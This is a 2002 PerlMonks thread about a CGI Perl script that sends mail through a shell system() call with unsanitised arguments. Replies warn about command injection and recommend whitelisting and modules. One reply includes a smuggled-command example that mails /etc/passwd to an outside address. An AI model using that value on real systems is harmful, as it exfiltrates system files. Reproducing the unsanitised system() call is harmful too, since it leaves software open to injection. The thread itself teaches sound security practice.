Yet another email question

bikeguy has asked for the wisdom of the Perl Monks concerning the following question:

I know - email has been discussed like 45,000 times on here. But I have a little issue I can't seem to resolve. I am trying to send an email like so:

$dirname = ARGV[0];
$fname = ARGV[1];
...
$status = system("mail -s \"test subject\" < $dirname$fname");
[download]

Now, if I run this from a command line it works fine. However, if this is in a separate program called from a CGI script, it sends an empty email and reports back that the email will have a null body.

I would like to avoid using any modules here, and the problem with piping it back through is that I would need to read the file I'm trying to use as the message body. Not a huge deal, but if I can accomplish this as one line I'd like to.

Does anyone have any ideas as to why this won't run under this circumstance? I have even tried hardcoding the filename in, same thing. I'm stumped!

Comment on Yet another email question Download Code

Replies are listed 'Best First'.
Re: Yet another email question by amphiplex (Monk) on Jul 23, 2002 at 09:42 UTC
Hi ! I cant believe that this works, you have not specified any recipients ? Or ary you using some custom `mail` ? Aside from this: You really should be using a module, especially when using this in a CGI-Script If you absolutely must use the `mail` binary, make sure to check the variables. If you don't check the user input here, someone could, for example, give you a dirname of `"; mail foo@hacker.com < /etc/passwd"`. So strip out at least: [&;<>"'`\|] use the absolute path to your mail binary, something like `/usr/bin/mail` ---- amphiplex	[reply] [d/l]
Re^2: Yet another email question by Aristotle (Chancellor) on Jul 23, 2002 at 13:49 UTC
No no no. Don't strip out blacklisted characters. Instead, strip out any but whitelisted ones. For example, `s/\W+//g`. It is too easy to overlook something otherwise. bikeguy: you probably want to read perlsec. Also, Ovid's excellent CGI course has a good easily digestible discussion of CGI script security. Makeshifts last the longest.	[reply] [d/l]
Re: Yet another email question by Ionitor (Scribe) on Jul 23, 2002 at 14:55 UTC
amphiplex and Aristotle are very right--you have some major security issues to worry about here, and using a command line program instead of a mail module is neither safe nor portable. However, I will say that there's a good chance that you don't have your permissions set correctly. It's likely that you own the file, so you can read it when you use the script at the command line, but the web server doesn't have the right permissions.	[reply]